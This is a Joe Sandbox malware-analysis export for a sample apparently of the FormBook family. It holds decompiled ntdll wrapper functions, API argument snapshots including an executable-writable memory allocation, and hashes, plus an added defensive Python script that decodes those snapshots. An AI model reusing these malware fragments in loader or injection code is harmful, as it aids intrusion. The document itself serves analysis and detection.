                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 240 41a30a-41a361 call 41af60 NtCreateFile
                                          C-Code - Quality: 64%
                                          			E0041A30A(void* __eax, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                          				long _t25;
                                          
                                          				asm("daa");
                                          				_pop(_t35);
                                          				_t19 = _a8;
                                          				_t5 = _t19 + 0xc5c; // 0xc5c
                                          				E0041AF60( *((intOrPtr*)(_a8 + 0x14)), _t19, _t5,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x28);
                                          				_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                          				return _t25;
                                          			}

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ec5c2006babe1b143ba46c5408079c29f07c10c96c76ec8253bf392964ae0bf9
                                          • Instruction ID: 22476ba4d21eacb1485a471025a5d994f2f22431d9c8235947b6ffffda91aae7
                                          • Opcode Fuzzy Hash: ec5c2006babe1b143ba46c5408079c29f07c10c96c76ec8253bf392964ae0bf9
                                          • Instruction Fuzzy Hash: 7A01B2B6201108AFDB08CF89DD84EDB37A9EF8C754F118209BA0D97245C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 243 41a310-41a326 244 41a32c-41a361 NtCreateFile 243->244 245 41a327 call 41af60 243->245 245->244
                                          C-Code - Quality: 100%
                                          			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                          				long _t21;
                                          
                                          				_t3 = _a4 + 0xc5c; // 0xc5c
                                          				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                          				return _t21;
                                          			}

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                          • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
                                          • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                          • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 246 41a43a-41a43c 247 41a40d-41a426 246->247 248 41a43e-41a456 246->248 251 41a42c-41a439 247->251 252 41a427 call 41af60 247->252 249 41a45c-41a469 NtClose 248->249 250 41a457 call 41af60 248->250 250->249 252->251
                                          C-Code - Quality: 62%
                                          			E0041A43A(void* __eax, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                          				long _v0;
                                          				intOrPtr* __esi;
                                          				void* __ebp;
                                          				void* _t19;
                                          				intOrPtr* _t20;
                                          				void* _t22;
                                          
                                          				if(__eflags >= 0) {
                                          					_t10 = _a4;
                                          					_t2 = _t10 + 0x14; // 0x56c29f0f
                                          					_t3 = _t10 + 0xc68; // 0x409d7b
                                          					_t20 = _t3;
                                          					E0041AF60( *_t2, _a4, _t20,  *_t2, 0, 0x2b);
                                          					return  *((intOrPtr*)( *_t20))(_a8, _t19, _t22);
                                          				} else {
                                          					__eflags = __eax;
                                          					_push(__ebp);
                                          					__ebp = __esp;
                                          					__eax = _v0;
                                          					_t6 = __eax + 0x14; // 0x56c29f0f
                                          					__ecx =  *_t6;
                                          					_t7 = __eax + 0xc6c; // 0x409d7f
                                          					__esi = _t7;
                                          					E0041AF60( *_t6, _v0, __esi,  *_t6, 0, 0x2c) =  *__esi;
                                          					__eax = NtClose(_a4); // executed
                                          					__esi = __esi;
                                          					__ebp = __ebp;
                                          					return __eax;
                                          				}
                                          			}

                                          APIs
                                          • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: db8382feca8c007df7d05794e81be782f43ebc103989d7b0105d3190605e6f01
                                          • Instruction ID: 1e38f2064f271834fb41f04a2effb08a09c1e8cdcf796d71c443f5c73b541b47
                                          • Opcode Fuzzy Hash: db8382feca8c007df7d05794e81be782f43ebc103989d7b0105d3190605e6f01
                                          • Instruction Fuzzy Hash: 13F0F0761002046BCB10EBA8DC88DE77BA8EF44724F14829AF95C5B203C534E65587E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 254 41a3c0-41a409 call 41af60 NtReadFile
                                          C-Code - Quality: 37%
                                          			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                          				void* _t18;
                                          				intOrPtr* _t27;
                                          
                                          				_t13 = _a4;
                                          				_t27 = _a4 + 0xc64;
                                          				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                          				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                          				return _t18;
                                          			}

                                          APIs
                                          • NtReadFile.NTDLL(004159C2,5D9515B3,FFFFFFFF,00415681,?,?,004159C2,?,00415681,FFFFFFFF,5D9515B3,004159C2,?,00000000), ref: 0041A405
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                          • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
                                          • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                          • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 257 41a4ea-41a52d call 41af60 NtAllocateVirtualMemory
                                          C-Code - Quality: 58%
                                          			E0041A4EA(signed int __esi, intOrPtr _a5, void* _a9, PVOID* _a13, long _a17, long* _a21, long _a25, long _a29) {
                                          				long _t14;
                                          				signed int _t22;
                                          
                                          				_t22 = __esi | 0x0000004c;
                                          				asm("daa");
                                          				asm("rcl byte [ebp-0x75], 1");
                                          				_t10 = _a5;
                                          				_push(_t22);
                                          				_t3 = _t10 + 0xc7c; // 0x3c7c
                                          				E0041AF60( *((intOrPtr*)(_a5 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a5 + 0x14)), 0, 0x30);
                                          				_t14 = NtAllocateVirtualMemory(_a9, _a13, _a17, _a21, _a25, _a29); // executed
                                          				return _t14;
                                          			}

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 7c5b439b8bc17e869c2cd1c2d8e37378e2c0988c2d98dffb62198324858ccf8c
                                          • Instruction ID: d5307538639919dc26bef951cf3138e465fd58974424f6e3b5853008a3f35d9d
                                          • Opcode Fuzzy Hash: 7c5b439b8bc17e869c2cd1c2d8e37378e2c0988c2d98dffb62198324858ccf8c
                                          • Instruction Fuzzy Hash: 81F08CB2610119AFDB14DF98DC81EEB7BA8EF8C354F118108FE0DA7241C630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 260 41a4f0-41a506 261 41a50c-41a52d NtAllocateVirtualMemory 260->261 262 41a507 call 41af60 260->262 262->261
                                          C-Code - Quality: 100%
                                          			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				long _t14;
                                          
                                          				_t3 = _a4 + 0xc7c; // 0x3c7c
                                          				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t14;
                                          			}

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                          • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
                                          • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                          • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph: single block 272 (41a440-41a469): call 41af60, then NtClose
                                          C-Code - Quality: 100%
                                          			E0041A440(intOrPtr _a4, void* _a8) {
                                          				long _t8;
                                          				// _a4 is the context structure pointer (same layout as in E0041A4F0);
                                          				// _a8 is the handle to close.
                                          
                                          				_t5 = _a4;
                                          				_t2 = _t5 + 0x14; // 0x56c29f0f  (decompiler annotation of the sampled value)
                                          				_t3 = _t5 + 0xc6c; // 0x409d7f
                                          				// Same pre-call helper as in E0041A4F0, here with index 0x2c and the slot at
                                          				// context+0xc6c (= 0xbbc + 4*0x2c); the value at context+0x14 is passed twice.
                                          				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                          				_t8 = NtClose(_a8); // executed
                                          				return _t8;
                                          			}




                                          Instruction addresses of this function (instruction text not preserved in the export): 0x0041a443, 0x0041a446, 0x0041a44f, 0x0041a457, 0x0041a465, 0x0041a469

                                          APIs
                                          • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                          • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
                                          • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                          • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%
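The two wrapper entries above (E0041A4F0 around NtAllocateVirtualMemory and E0041A440 around NtClose) are easier to reason about with a small script than by eye: the API bullet prints more stack slots than the call has parameters, and the pre-call helper E0041AF60 receives an index and a context offset whose relation is only visible once both wrappers are compared. The following Python helper is an added example written for this page; it is not code from the Joe Sandbox report or from the FormBook sample. It parses the report's API bullet format, decodes NtAllocateVirtualMemory's AllocationType/Protect pair using the documented Windows constants, and fits the index-to-offset relation across the wrappers. The adjacent-pair heuristic in find_alloc_pair and the linear fit in infer_slot_table are this edit's assumptions, as are all function names; the two input lines and the (index, offset) pairs are copied from the entries above. It goes beyond the two entries in that it accepts PAGE_ modifier bits and any number of wrappers.

```python
"""Decode the two ntdll wrapper entries above (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Optional

# Documented Windows constants for NtAllocateVirtualMemory's AllocationType / Protect.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE_EXECUTABLE = {0x40, 0x80}

# Shape of a Joe Sandbox "APIs" bullet: Name.MODULE(arg,arg,...), ref: ADDR
API_LINE = re.compile(r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list  # stack snapshot at the call; None where the report prints '?'
    ref: int    # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    m = API_LINE.search(line)
    if m is None:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args = [None if t.strip() == "?" else int(t, 16) for t in m["args"].split(",")]
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16))


def decode_mem(v: int) -> Optional[str]:
    """'MEM_A|MEM_B' if v is a non-empty combination of known MEM_ flags, else None."""
    if v == 0 or v & ~sum(MEM_FLAGS):
        return None
    return "|".join(n for f, n in sorted(MEM_FLAGS.items()) if v & f)


def decode_page(v: int) -> Optional[str]:
    """PAGE_ name plus modifiers if v is a valid protection constant, else None."""
    if (v & 0xFF) not in PAGE_BASE or v & ~0x7FF:
        return None
    return "|".join([PAGE_BASE[v & 0xFF]] + [n for f, n in sorted(PAGE_MODIFIERS.items()) if v & f])


def find_alloc_pair(args):
    """The snapshot carries more slots than the call has parameters, so position is
    unreliable. Assumption used here: AllocationType/Protect is the first adjacent
    pair of resolved values that both decode cleanly. Returns (index, mem, page)."""
    for i in range(len(args) - 1):
        a, p = args[i], args[i + 1]
        if a is None or p is None:
            continue
        mem, page = decode_mem(a), decode_page(p)
        if mem and page:
            return i, mem, page
    return None


def is_wx_allocation(call: ApiCall) -> bool:
    """True when an NtAllocateVirtualMemory snapshot shows a writable+executable Protect."""
    if call.name != "NtAllocateVirtualMemory":
        return False
    hit = find_alloc_pair(call.args)
    return hit is not None and (call.args[hit[0] + 1] & 0xFF) in WRITABLE_EXECUTABLE


def infer_slot_table(wrappers):
    """Each wrapper hands E0041AF60 an index and a context offset. Fit
    offset = base + stride * index on the first two wrappers, then require every
    wrapper to lie on that line; returns None if the relation does not hold."""
    (_, i0, o0), (_, i1, o1) = wrappers[:2]
    if i1 == i0:
        return None
    stride, rem = divmod(o1 - o0, i1 - i0)
    if rem:
        return None
    base = o0 - stride * i0
    if any(base + stride * i != o for _, i, o in wrappers):
        return None
    return {"base": base, "stride": stride}


# Inputs copied from the two report entries above.
ALLOC_LINE = ("NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,"
              "?,00003000,00000040,00409113,00000000), ref: 0041A529")
CLOSE_LINE = "NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465"
WRAPPERS = [("NtAllocateVirtualMemory", 0x30, 0xC7C),  # (API, index, offset) given to E0041AF60
            ("NtClose", 0x2C, 0xC6C)]

if __name__ == "__main__":
    for line in (ALLOC_LINE, CLOSE_LINE):
        call = parse_api_line(line)
        print(f"{call.name} @ {call.ref:08x}: {find_alloc_pair(call.args)} wx={is_wx_allocation(call)}")
    print("pre-call slot table:", infer_slot_table(WRAPPERS))
```

With the two wrappers from this report the fit gives base 0xbbc and stride 4, so each index selects a 4-byte slot at context+0xbbc+4*index. Any further wrapper appended to WRAPPERS either lies on that line or makes infer_slot_table return None, which is the check to run before trusting the pattern on more of the dump; likewise is_wx_allocation only fires when a pair decodes cleanly, so a snapshot with the Protect slot printed as '?' yields no verdict rather than a false one.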

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
